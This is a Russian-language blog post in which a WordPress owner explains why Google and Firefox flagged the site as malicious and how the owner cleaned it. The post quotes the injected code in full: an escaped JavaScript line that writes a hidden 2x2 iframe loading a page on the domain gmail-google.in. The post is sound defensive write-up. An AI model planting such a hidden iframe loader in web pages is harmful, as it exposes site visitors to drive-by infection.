aKorf.ru

Человеческий Интернет-Маркетинг

Опасное содержимое сайта (методы лечения и причины)

имеется информация что эта веб-страница атакует компьютерыНа прошлой неделе, а именно во вторник, зайдя на свой сайт я обнаружил сообщение типа: "Имеется информация, что эта веб-страница атакует компьютеры" – естественно я был озадачен и удивлен!

Мой блог на Wordpress, ему больше года и за все это время я и не мог представить, что с ним может такое случится. Итак, разберу по порядку, почему вы можете видеть сообщение типа: "Имеется информация что эта веб-страница атакует компьютеры" и как избавится от этой "совместной акции Google и FireFox". 1. При заходе на свой сайт, вместо привычной вашей главной страницы, вы видите сообщение: Имеется информация что эта веб-страница атакует компьютеры, она может иметь такой вид:

 имеется информация что эта веб-страница атакует компьютеры

Вкратце, в сообщении говорится о том, что ваш сайт или страница атакует другие компьютеры, пытается установить какое-то программное обеспечение и в связи с вашими настройками безопасности она была заблокирована. У вас она может быть на русском, украинском, албанском и других языках, суть одна, сайт заражен вирусом, либо установлен какой-то скрипт, код, который представляет угрозу.

Причины: 1. Вы вставили текст какой-то партнерки, какого-то счетчика или информера, который что-то пытается получить от пользователя или установить какую-то программу. 2. Кто-то взломал ваш сайт и установил тот самый нежелательный скрипт, программу и тд 3. Кто-то взломал ваш фтп доступ, что в принципе одно и тоже с предыдущим пунктом.

Как узнать каким способом и из-за чего именно заблокирован сайт? Для начала хорошо бы чтоб ваш сайт был в Google Webmaster Tools, со всеми подтвержденными правами на право собственности. Заходим в аккаунт Google, переходим на заблокированный сайт и видим вверху алую полоску с предупреждением, нажимаем на ссылку и смотрим страницы, на которых найден тот самый вредоносный код. В моем случае это были 3, после 2-х дней стало 4 страницы. Но, как правило, код присутствовал на всех страницах сайта. Методы лечения. Самое интересное то, что в коде сайта я нашел вот такой вот код, в самом верху:

jhtm=’%3Ciframe%20src%3D%22http% 3A//gmail-google.in/index.php%22%20width%3D2%20height%3D2%20 style%3D%22visibility%3A%20hidden%22%3E%3C/iframe%3E’;crypo= unescape(jhtm);document.write(crypo);

Зайдя в шаблон сайта, через админку Wordpress, я перелопатил все файлы, но код так и не нашел. После чего я проверил сайт на вирусы. Купленый Касперский, Доктор Веб и Аваст ничего у меня не заметили, и я нашел достаточно полезный ресурс – http://antivirus-alarm.ru/, который проверил мой сайт сразу несколькими антивирусами. 3 из которых обнаружили, что у меня ява троян – [JS:ScriptPE-inf]. Остальные антивирусы молчали.  

В целом, этого хватило, чтобы понять что делать дальше.

  • Первым делом я поменял доступ к админке в Wordpress.
  • Изменил пароль на FTP и панель управления сайтом (хостингом).
  • Наиболее частые файлы, которые подвергаются атакам, это index.php – поэтому я установил права доступа к файлу 444.
  • После чего, зайдя в этот же файл я и увидел зловредный код, который просто удалил.
  • Проверяем ещё раз сайт, вышеупомянутым сервисом – чисто!
  • Заходим в гугл аккаунт, в панель вебмастера и говорим о том, что мы учли все пожелания и правки, просим пересмотреть сайт. Ждем… и в течении дня (в моем случае) сайт снова нормально загружался через FireFox, а в Google WT все предупреждения были сняты.

Почему я пишу об этом? Я столкнулся с этой проблемой, но ничего внятного так и не нашел, пришлось перекопать десяток сайтов Америки, где по частям сложилась вот такая картина, которую я описал выше. Надеюсь кому-то это принесет пользу и вы сэкономите свое время на выявление вируса и борьбу с ним.

В заключении:

  • Проверяйте периодически свой сайт на вирусы, хотя бы раз в неделю (месяц).
  • Регулярно меняйте пароли доступа к сайту, к ftp и тд
  • Закройте все явные дыры сайта.
  • После чистки сайта и смены пароля проверьте сайт на вирусы ещё раз.

Не болейте! :)

Ссылки от партнеров:

 
Отзывов нет

Ваше сообщение

Пожалуйста, введите свои данные и комментарий ниже.
Имя
E-mail
Сайт
Сообщение